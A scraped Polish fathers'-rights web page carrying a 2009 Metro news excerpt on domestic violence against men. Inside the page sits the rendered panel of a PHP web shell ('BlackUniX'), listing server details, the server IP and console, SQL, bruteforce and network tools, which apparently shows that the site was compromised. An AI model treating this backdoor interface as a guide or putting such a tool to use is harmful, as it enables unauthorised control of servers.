W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 01:52:58
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Nękani mężczyźni wychodzą z ukrycia
11.05.2009.
Obrażani, szantażowani, zaszczuci, a nawet bici. Do terapeutów, a także na policję zgłasza się coraz więcej mężczyzn, którzy padają ofiarami przemocy domowej ze strony żon i partnerek. Całość artykułu w dzisiejszym dzienniku Metro, poniżej skrót materiału przygotowanego przez Michała Stangreta
Marek z Krakowa (32 l.). Żonaty od sześciu lat. Z Magdą mają dwójkę przedszkolnych dzieci. Jeszcze rok temu - wzorowa, szczęśliwa rodzina. Kłopoty zaczęły się, gdy na jesieni ub. roku Marek, pracownik firmy deweloperskiej, stracił pracę.

- Potrzebowałem wtedy jak nigdy wsparcia rodziny. Tymczasem Magda zaczęła lać na mnie kubły pomyj: że jestem nieudacznikiem, że przeze mnie cała rodzina cierpi, że się obijam, choć zajmowałem się dziećmi. Mieliśmy za co żyć, bo Magda zarabia nieźle. Potem było coraz gorzej. - gdy szliśmy do znajomych, robiła sobie ze mnie pośmiewisko.

Według Marka horror zaczął się, gdy córka zapytała go, dlaczego nie kocham mamusi, tylko inną kobietę!

- A ja świata poza nie widzę. To była szokująca zagrywka. Dziś żona straszy mnie rozwodem i grozi wyrzuceniem z mieszkania. Zamiast pracy mam depresję. Czuje się zaszczuty i poniżony.

- Mężczyzn w podobnej sytuacji, którzy padają ofiarami przemocy ze strony kobiet, mamy coraz więcej - przyznaje Robert Kucharski, szef organizacji W Stronę Ojca, która m.in. w Krakowie, Katowicach i Warszawie prowadzi terapeutyczne grupy wsparcia, m.in. dla panów przeżywających kryzysy małżeńskie. Na spotkania przychodzą nie tylko mężczyźni z depresją, ale i potężnymi siniakami. - Gdy pokazałem koleżance sińce, które zadała mi żona, zobaczyłem jedynie niedowierzanie - mówi Bartosz, jeden z uczestników terapii.

O tym, że problem jest, mówi także policja, choć jej statystyki nie rozróżniają przemocy w rodzinie na psychiczną i fizyczną.

- W 1999 r. notowaliśmy 4 tys. takich przypadków rocznie, w zeszłym roku było to aż 11 tys. - mówi podinsp. Grażyna Puchalska z Komendy Głównej Policji. I choć szykanowanych mężów wciąż jest w Polsce aż ośmiokrotnie mniej niż żon, to Puchalska zwraca uwagę na to, że tylko w ubiegłym roku liczba poszkodowanych panów zwiększyła się aż o 30 proc.

- To bezprecedensowy wzrost. Po części może to wynikać z tego, że panowie nie boją się już mówić o swoich problemach. Nie wstydzą się, że ucierpi na tym ich duma, ambicja - podejrzewa policjantka.

Sławomir Mielnik, prezes Stowarzyszenia na rzecz Równouprawnienia i Poszanowania Prawa, które działa na rzecz równouprawnienia płci twierdzi, że wciąż nikt jednak tą sprawą poważnie się nie zajmuje, bo w naszym społeczeństwie pokutuje stereotyp, że to kobiety zawsze są ofiarami, a mężczyźni - katami. - Gdy facet uderzy kobietę, to jest społecznie skreślony, ale już jak żona tłucze męża, to w najlepszym wypadku myślimy "pantoflarz" - twierdzi Mielnik, który wraz ze swoim stowarzyszeniem zdecydował się pomagać panom i stworzył dla nich spotkania z terapeutami. - Jeszcze w tym roku chcemy zorganizować spotkania grup wsparcia dla takich osób w Lublinie.

Elżbieta Radziszewska, pełnomocnik rządu ds. równego traktowania dodaje: - Fakty są takie, że przemoc fizyczna to wciąż domena mężczyzn, ale to kobiety częściej stosują wobec mężczyzn przemoc psychiczną. Im więcej się o tym mówi tym lepiej. Będę robiła wszystko, by zmienić myślenie o przemocy wobec panów. Po pierwsze już planujemy uruchomienie szkoleń antydyskryminacyjnych dla sędziów i prokuratorów którzy zajmują się sprawami rodzinnymi i będziemy uwrażliwiać ich na te kwestie. Mężczyzn należy zaś edukować i mówić im jakie maja prawa i że nie powinni się wstydzić zgłaszać przypadków stosowania wobec nich przemocy.

Czy przemoc domowa wobec mężczyzn to fikcja, czy też skrywany problem? Napisz do nas: metro(at)agora.pl
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.